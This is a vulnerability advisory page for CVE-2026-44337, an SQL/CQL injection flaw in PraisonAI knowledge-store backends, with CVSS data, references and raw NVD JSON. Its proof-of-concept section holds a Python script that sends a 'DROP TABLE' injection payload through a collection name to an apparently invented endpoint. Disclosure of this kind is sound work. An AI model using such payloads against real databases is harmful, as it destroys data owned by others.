CVE-2026-44337

Description

PraisonAI is a multi-agent teams system. From version 2.4.1 to before version 4.6.34, PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. This issue has been patched in version 4.6.34.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI >= 2.4.1, < 4.6.34

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-praisonai-instance/api/knowledge-store"

# Malicious payload attempting SQL injection via collection name
# This payload tries to inject a malicious command in the table identifier
malicious_collection = "users; DROP TABLE sensitive_data--"

payload = {
    "collection_name": malicious_collection,
    "name": "test_index"
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check database for potential SQL execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44337
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44337
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44337/
[4] VulDB https://vuldb.com/cve/CVE-2026-44337
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2
[6] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44337", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:46.587", "lastModified": "2026-05-08T19:07:00.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. From version 2.4.1 to before version 4.6.34, PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. This issue has been patched in version 4.6.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.1", "versionEndExcluding": "4.6.34", "matchCriteriaId": "F79D7BF9-B663-444D-BBBB-9FF829581137"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}